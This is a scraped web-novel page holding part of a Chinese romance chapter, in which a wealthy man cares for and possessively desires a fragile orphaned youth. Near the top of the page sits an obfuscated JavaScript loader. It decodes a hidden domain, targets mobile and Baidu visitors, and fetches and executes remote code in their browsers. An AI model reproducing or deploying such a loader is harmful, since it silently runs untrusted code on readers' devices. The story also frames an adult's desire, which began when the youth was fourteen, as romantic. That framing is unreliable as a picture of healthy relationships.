躺着看小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

重生之饲养法则_3(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

“夏夏?”沈檀夕一把将神志不清的萧夏打横抱了起来,少年本身的清新气味喝着低酒精浓度的甜酒味道,让人瞬间也不由地跟着微醺起来。

但原本坐在萧夏旁边的同学却并未喝多,他赶忙起身拦住了沈檀夕:“你是谁!?”

沈檀夕没说话,抬眼间冰冷的眼神足以封住那个男生的求知欲望。

“沈总,要不您先带萧少爷回去?”店长赶忙将薄毯轻轻地覆在萧夏的身上,小心翼翼的动作里丝毫没有碰到那醉酒的人一根汗毛,“您放心,这里我肯定都给您处理好了!”

“嗯,”沈檀夕应了一声,低头看了眼像是睡过去的萧夏,便又大步地离开了包房,临走前又留下了一句话,“别再发生这种事情。”

店长忙点头称是,更连连解释说这绝对是个意外。

萧夏在熟睡中被沈檀夕带回了家,自始至终没有过半点难受的意思,仿佛就是因困倦而睡着了而已。霍医生也来替他检查过身体,心率、血压、酒精浓度全都测了个遍,连瞳孔都都查了好几遍,若不是萧夏在迷糊中露出了委屈又不情愿的表情,怕是沈檀夕还会给他做个全身大检查!

不过这也不能怪沈檀夕,主要是因为萧夏的身体确实一直都很弱,再加上有先天性的心脏疾病,他这人根本就是不能碰酒的。

“不用担心,应该只是喝了少量的鸡尾酒,醉了而已,”霍医生收拾了药箱,然后准备离开,“明早给他吃些清淡的,有什么事再叫我过来吧。”

“好,”沈檀夕礼貌颔首,有道,“姚伯,送客。”

外人都退了出去,房间里只剩下熟睡萧夏,沈檀夕坐到床边,然后伸出手轻轻地抚摸着萧夏的脸颊。打小养尊处优的精致生活令年过二十的萧夏仍保持着十四五的少年肌肤,通透皙白得仿若透明一般,细腻的手感更是令人无法不久久留恋。

沈檀夕现是而立之年,第一次见到萧夏的时候是二十四岁,而那时的萧夏也才十四岁,那个漂亮的男孩穿着精致的佯装,身材纤细娇小,但同时又带着少年特有的挺拔,就像个高贵的小王子。只可惜人有祸夕旦福,萧家上下二十来口人竟都死于一场以‘家族旅行’为名义的海难之中,最后也只有一个十六岁‘小王子’活了下来。

于是在那年夏天,因为两家是世交的关系,沈檀夕从那场盛大的葬礼中将萧夏带回了自己的家——那是一个从未经历过世态磨砺的贵公子,十六岁之前一直都过着比一般的富二代还有令人难以仰望的奢侈生活。

尤其是在清早听到萧夏一脸疑惑地问他‘为什么没人帮他穿衣服’时,沈檀夕彻底惊呆了……不过好在看到萧夏虽然是困惑但好歹是会穿衣服的情况下,他才勉强没让他的小伙伴陪着他一起惊呆了。

而除此之外,萧夏还有很多令沈檀夕难以相信的生活方式。

比如他一定会在九点前入睡——而沈檀夕初中的时候就已经不再凌晨前上床了;又比如他从不碰酒精哪怕是酒心巧克力都不可以——而沈檀夕在出生满月那天就已经尝过白酒的味道了;再比如说他从没上过学校哪怕是私立的贵族学校都没过,但他却有相当大的知识量,可谓是上知天文下知地理——而沈檀夕虽然也是富二代但却走得完全是接受高等学府教育的学习方式。

沈檀夕对萧夏曾经的生活简直无法想象,因为他已经不知道那是该用‘恐怖’还是‘残忍’或是其他什么词去形容才更合适的了!但随着相处的时间渐渐增多,沈檀夕慢慢地能理解萧夏之前的生活到底为什么会是这样,而同时他也觉得,萧夏这样的人确实更适合那样的生活。

002 金贵少爷

羸弱的身体、天真的思想,还有那张精致漂亮的脸。

这样的萧夏,让沈檀夕觉得他简直就是个需要24小时保护起来的生物,别说是出现了什么大差错,光是看到他身上不小心蹭破了个皮肉,都会让人觉得这种事简直天理难容!

不过除此之外,沈檀夕也不否认自己的阴暗心理——他确实想把萧夏豢养起来!甚至想在他的脖子上弄个项圈!然后把他压在床上既温柔又强硬地‘欺负’,想看他哭想看他颤抖想要狠狠地揉碎这个令人太想要小心翼翼地保护起来的精致宝贝!

于是沈檀夕忍了两年,终于在萧夏十八岁的时候……下手了。

但这个过程却比他想象中的简单了太多——

“夏夏,你喜欢沈大哥吗?”

“喜欢啊~”

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间
上一章
目录
下一页